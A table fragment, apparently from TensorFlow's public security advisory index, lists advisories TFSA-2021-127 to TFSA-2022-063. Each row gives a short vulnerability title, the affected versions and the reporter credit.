| [TFSA-2022-063](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-063.md) | Missing validation causes denial of service via `DeleteSessionTensor` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-062](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-062.md) | Missing validation crashes `QuantizeAndDequantizeV4Grad` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-061](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-061.md) | Missing validation causes `TensorSummaryV2` to crash | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University and Hong Jin, Singapore Management University|
| [TFSA-2022-060](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-060.md) | Code injection in `saved_model_cli` | < 2.9.0 | Andey Robins, Cybersecurity Education and Research Lab, University of Wyoming |
| [TFSA-2022-059](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-059.md) | Null pointer dereference in `BuildXlaCompilationCache` (XLA) | < 2.8.0 | (discovered internally) |
| [TFSA-2022-058](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-058.md) | Segfault in `simplifyBroadcast` (MLIR) | == 2.8.0 | (discovered internally) |
| [TFSA-2022-057](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-057.md) | Multiple crashes, heap OOB accesses in TFG dialect (MLIR) | >= 2.7.0, < 2.8.0 | (discovered internally) |
| [TFSA-2022-056](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-056.md) | Crash due to erroneous `StatusOr` | >= 2.7.0, < 2.8.0 | (discovered internally) |
| [TFSA-2022-055](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-055.md) | Heap OOB access in `RunForwardTypeInference` | == 2.8.0 | (discovered internally) |
| [TFSA-2022-054](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-054.md) | Stack overflow due to self-recursive function in `GraphDef` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-053](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-053.md) | `CHECK` failure in constant folding | < 2.8.0 | (discovered internally) |
| [TFSA-2022-052](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-052.md) | Null pointer dereference in Grappler's `IsConstant` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-051](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-051.md) | Integer overflow in Grappler cost estimation of crop and resize operation | < 2.8.0 | (discovered internally) |
| [TFSA-2022-050](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-050.md) | `CHECK`-fails due to attempting to build a reference tensor | < 2.8.0 | (discovered internally) |
| [TFSA-2022-049](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-049.md) | Multiple `CHECK`-fails in `function.cc` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-048](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-048.md) | Memory leak in decoding PNG images | < 2.8.0 | (discovered internally) |
| [TFSA-2022-047](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-047.md) | Use after free in `DecodePng` kernel | < 2.8.0 | (discovered internally) |
| [TFSA-2022-046](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-046.md) | `CHECK`-failures in binary ops due to type confusion | < 2.8.0 | (discovered internally) |
| [TFSA-2022-045](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-045.md) | `CHECK`-failures in `TensorByteSize` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-044](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-044.md) | `CHECK`-failures during Grappler's `SafeToRemoveIdentity` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-043](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-043.md) | `CHECK`-failures during Grappler's `IsSimplifiableReshape` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-042](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-042.md) | Abort caused by allocating a vector that is too large | < 2.8.0 | (discovered internally) |
| [TFSA-2022-041](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-041.md) | Memory leak when a graph node is invalid | < 2.8.0 | (discovered internally) |
| [TFSA-2022-040](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-040.md) | Null dereference in `GetInitOp` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-039](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-039.md) | Integer overflow in `OpLevelCostEstimator::CalculateOutputSize` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-038](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-038.md) | Integer overflow in `OpLevelCostEstimator::CalculateTensorSize` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-037](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-037.md) | Unitialized variable access in `AssignOp` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-036](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-036.md) | Heap OOB read/write in `SpecializeType` | >= 2.6.0, < 2.8.0 | (discovered internally) |
| [TFSA-2022-035](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-035.md) | Crash when type cannot be specialized | >= 2.6.0, < 2.8.0 | (discovered internally) |
| [TFSA-2022-034](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-034.md) | Null-dereference when specializing tensor type | >= 2.6.0, < 2.8.0 | (discovered internally) |
| [TFSA-2022-033](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-033.md) | `CHECK`-fail when decoding invalid tensors from proto | < 2.8.0 | (discovered internally) |
| [TFSA-2022-032](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-032.md) | Heap OOB write in Grappler | < 2.8.0 | (discovered internally) |
| [TFSA-2022-031](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-031.md) | `CHECK`-fail with repeated `AttrDef` | < 2.8.0 | (discovered internally) |
| [TFSA-2022-030](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-030.md) | `CHECK`-fail when decoding resource handles from proto | < 2.8.0 | (discovered internally) |
| [TFSA-2022-029](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-029.md) | Missing validation causes `tf.sparse.split` to crash when `axis` is a tuple | < 2.8.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/53660)
| [TFSA-2022-028](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-028.md) | Integer overflow in Range resulting in undefined behavior and OOM | < 2.8.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/52676)
| [TFSA-2022-027](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-027.md) | Insecure temporary file | < 2.8.0 | Srikanth Prathi on huntr.dev, internal variant analysis for more fixes |
| [TFSA-2022-026](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-026.md) | Read and Write outside of bounds in TFLite | < 2.8.0 | Wang Xuan of Qihoo 360 AIVul Team |
| [TFSA-2022-025](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-025.md) | Dangerous OOB write in TFLite | < 2.8.0 | Wang Xuan of Qihoo 360 AIVul Team |
| [TFSA-2022-024](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-024.md) | Integer overflow in TFLite | < 2.8.0 | Wang Xuan of Qihoo 360 AIVul Team |
| [TFSA-2022-023](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-023.md) | Integer overflow in TFLite array creation | < 2.8.0 | Wang Xuan of Qihoo 360 AIVul Team |
| [TFSA-2022-022](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-022.md) | FPE in depthwise convolutions in TFLite | < 2.8.0 | Wang Xuan of Qihoo 360 AIVul Team |
| [TFSA-2022-021](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-021.md) | FPE in `BiasAndClamp` in TFLite | < 2.8.0 | Wang Xuan of Qihoo 360 AIVul Team |
| [TFSA-2022-020](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-020.md) | Heap overflow in `SparseCountSparseOutput` | < 2.8.0 | Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-019](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-019.md) | Integer overflow leading to crash in `SparseCountSparseOutput` | < 2.8.0 | Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-018](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-018.md) | Reference binding to null pointer in `QuantizedMaxPool` | < 2.8.0 | Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-017](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-017.md) | Assertion failure based denial of service via faulty bin count operations | < 2.8.0 | Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-016](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-016.md) | Undefined behavior in `SparseTensorSliceDataset` | < 2.8.0 | Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-015](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-015.md) | `CHECK`-fails when building invalid/overflowing tensor shapes | < 2.8.0 | Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-014](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-014.md) | Division by zero in `FractionalMaxPool` | < 2.8.0 | Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-013](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-013.md) | `CHECK`-failures in `MapStage` | < 2.8.0 | Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-012](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-012.md) | Integer overflows in `AddManySparseToTensorsMap` | < 2.8.0 | Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-011](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-011.md) | Integer overflows in most sparse component-wise ops | < 2.8.0 | Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-010](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-010.md) | More incomplete validation in boosted trees code | < 2.8.0 | Yu Tian of Qihoo 360 AIVul Team, Faysal Hossain Shezan from University of Virginia |
| [TFSA-2022-009](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-009.md) | OOM due to integer overflow in `StringNGrams` | < 2.8.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2022-008](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-008.md) | OOM in `ThreadPoolHandle` | < 2.8.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2022-007](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-007.md) | Type confusion in shape inference for `ConcatV2` | < 2.8.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2022-006](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-006.md) | Overflow and divide by zero in `UnravelIndex` | < 2.8.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2022-005](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-005.md) | Heap OOB access in `FractionalAvgPoolGrad` | < 2.8.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2022-004](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-004.md) | Integer overflow in shape inference for `Dequantize` | < 2.8.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2022-003](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-003.md) | Heap OOB access in `Dequantize` | < 2.8.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2022-002](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-002.md) | Heap OOB read in shape inference for `ReverseSequence` | < 2.8.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2022-001](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-001.md) | Floating point division by 0 when executing convolution operators | < 2.8.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2021-200](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-200.md) | Crash in `tf.math.segment_*` operations | < 2.7.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/46888)
| [TFSA-2021-199](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-199.md) | Crash in `max_pool3d` when size argument is 0 or negative | < 2.7.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/51936)
| [TFSA-2021-198](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-198.md) | Crashes due to overflow and `CHECK`-fail in ops with large tensor shapes | < 2.7.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/46890), [issue](https://github.com/tensorflow/tensorflow/issues/51618), [issue](https://github.com/tensorflow/tensorflow/issues/51908)
| [TFSA-2021-197](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-197.md) | Incomplete validation in `tf.summary.create_file_writer` | < 2.7.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/46909)
| [TFSA-2021-196](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-196.md) | Overflow/crash in `tf.tile` when tiling tensor is large | < 2.7.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/46911)
| [TFSA-2021-195](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-195.md) | Overflow/crash in `tf.image.resize` when size is large | < 2.7.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/46914)
| [TFSA-2021-194](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-194.md) | Overflow/crash in `tf.range` | < 2.7.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/46912), [issue](https://github.com/tensorflow/tensorflow/issues/46899), [issue](https://github.com/tensorflow/tensorflow/issues/46889)
| [TFSA-2021-193](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-193.md) | Missing validation during checkpoint loading | < 2.7.0 | (discovered internally) |
| [TFSA-2021-192](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-192.md) | Uninitialized access in `EinsumHelper::ParseEquation` | < 2.7.0 | (discovered internally) |
| [TFSA-2021-191](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-191.md) | Segfault while copying constant resource tensor | < 2.7.0 | (discovered internally) |
| [TFSA-2021-190](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-190.md) | Incomplete validation of shapes in multiple TF ops | < 2.7.0 | (discovered internally) |
| [TFSA-2021-189](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-189.md) | Incomplete validation in boosted trees code | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-188](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-188.md) | Heap OOB read in `tf.raw_ops.SparseCountSparseOutput` | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-187](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-187.md) | FPE in convolutions with zero size filters | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-186](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-186.md) | FPE in `ParallelConcat` | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-185](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-185.md) | Heap OOB read in all `tf.raw_ops.QuantizeAndDequantizeV*` ops | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-184](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-184.md) | Heap OOB in shape inference for `QuantizeV2` | >= 2.6.0, < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-183](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-183.md) | Heap OOB read in `tf.ragged.cross` | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-182](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-182.md) | Reference binding to `nullptr` in `tf.ragged.cross` | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-181](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-181.md) | Null pointer exception in `DeserializeSparse` | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-180](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-180.md) | Deadlock in mutually recursive `tf.function` objects | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-179](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-179.md) | Heap buffer overflow in `Transpose` | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-178](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-178.md) | Undefined behavior via `nullptr` reference binding in sparse matrix multiplication | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-177](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-177.md) | Use after free / memory leak in `CollectiveReduceV2` | >= 2.6.0, < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-176](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-176.md) | Integer division by 0 in `tf.raw_ops.AllToAll` | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-175](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-175.md) | Null pointer exception when `Exit` node is not preceded by `Enter` op | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-174](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-174.md) | Access to invalid memory during shape inference in `Cudnn*` ops | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-173](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-173.md) | Segfault due to negative splits in `SplitV` | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-172](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-172.md) | `SparseFillEmptyRows` heap OOB | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-171](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-171.md) | Heap OOB in `SparseBinCount` | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-170](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-170.md) | Arbitrary memory read in `ImmutableConst` | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-169](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-169.md) | Heap OOB in `FusedBatchNorm` kernels | < 2.7.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-168](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-168.md) | A use of uninitialized value vulnerability in Tensorflow | < 2.7.0 | Qian Feng from Baidu Security Team |
| [TFSA-2021-167](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-167.md) | Code injection in `saved_model_cli` | < 2.7.0 | Omer Kaspi from Vdoo |
| [TFSA-2021-166](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-166.md) | Use after free and segfault in shape inference functions | < 2.6.0 | (discovered internally) |
| [TFSA-2021-165](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-165.md) | Segfault on strings tensors with mismatched dimensions, due to Go code | >=2.5.0, < 2.6.0 | (Reported on GitHub) | [PR](https://github.com/tensorflow/tensorflow/pull/50508)
| [TFSA-2021-164](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-164.md) | FPE in LSH in TFLite | < 2.6.0 | Yakun Zhang of Baidu Security |
| [TFSA-2021-163](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-163.md) | Null pointer dereference in TFLite MLIR optimizations | < 2.6.0 | Yakun Zhang of Baidu Security |
| [TFSA-2021-162](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-162.md) | Null pointer dereference in TFLite | < 2.6.0 | Yakun Zhang of Baidu Security |
| [TFSA-2021-161](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-161.md) | Heap OOB in TFLite's `Gather*` implementations | < 2.6.0 | Yakun Zhang of Baidu Security |
| [TFSA-2021-160](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-160.md) | Heap OOB in TFLite | < 2.6.0 | Yakun Zhang of Baidu Security |
| [TFSA-2021-159](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-159.md) | Infinite loop in TFLite | == 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-158](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-158.md) | FPE in TFLite pooling operations | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-157](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-157.md) | FPE in TFLite division operations | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-156](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-156.md) | Use of unitialized value in TFLite | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-155](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-155.md) | NPE in TFLite | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-154](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-154.md) | Division by zero in TFLite | < 2.6.0 | Aivul Team from Qihoo 360, Yakun Zhang of Baidu Security |
| [TFSA-2021-153](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-153.md) | Heap OOB in nested `tf.map_fn` with `RaggedTensor`s | < 2.6.0 | Haris Sahovic |
| [TFSA-2021-152](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-152.md) | Arbitrary code execution due to YAML deserialization | < 2.6.0 | Arjun Shibu |
| [TFSA-2021-151](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-151.md) | Missing validation in shape inference for `Dequantize` | < 2.6.0 | Yakun Zhang of Baidu Security |
| [TFSA-2021-150](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-150.md) | Division by 0 in most convolution operators | < 2.6.0 | Yakun Zhang of Baidu Security |
| [TFSA-2021-149](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-149.md) | Reference binding to nullptr in shape inference | < 2.6.0 | Yakun Zhang of Baidu Security |
| [TFSA-2021-148](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-148.md) | Incomplete validation in `MaxPoolGrad` | < 2.6.0 | Yakun Zhang of Baidu Security |
| [TFSA-2021-147](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-147.md) | `CHECK`-fail in `MapStage` | < 2.6.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-146](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-146.md) | Heap OOB in `SdcaOptimizerV2` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-145](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-145.md) | Reference binding to nullptr in map operations | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-144](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-144.md) | Heap OOB in `UpperBound` and `LowerBound` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-143](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-143.md) | Crash in NMS ops caused by integer conversion to unsigned | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-142](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-142.md) | FPE in `tf.raw_ops.UnravelIndex` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-141](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-141.md) | Reference binding to nullptr in unicode encoding | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-140](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-140.md) | Reference binding to nullptr in `RaggedTensorToVariant` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-139](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-139.md) | Incomplete validation in MKL requantization | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-138](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-138.md) | Incomplete validation in `QuantizeV2` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-137](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-137.md) | Heap OOB in boosted trees | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-136](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-136.md) | Reference binding to nullptr in boosted trees | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-135](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-135.md) | Crash caused by integer conversion to unsigned | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-134](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-134.md) | Division by 0 in inplace operations | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-133](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-133.md) | Reference binding to nullptr and heap OOB in binary cwise ops | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-132](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-132.md) | Reference binding to nullptr in `MatrixSetDiagV*` ops | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-131](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-131.md) | Reference binding to nullptr in `MatrixDiagV*` ops | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-130](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-130.md) | Reference binding to nullptr in `RaggedTensorToSparse` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-129](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-129.md) | Heap OOB in `ResourceScatterUpdate` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-128](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-128.md) | Heap OOB and CHECK fail in `ResourceGather` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-127](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-127.md) | Division by 0 in `ResourceGather` | < 2.6.0 | Aivul Team from Qihoo 360 |
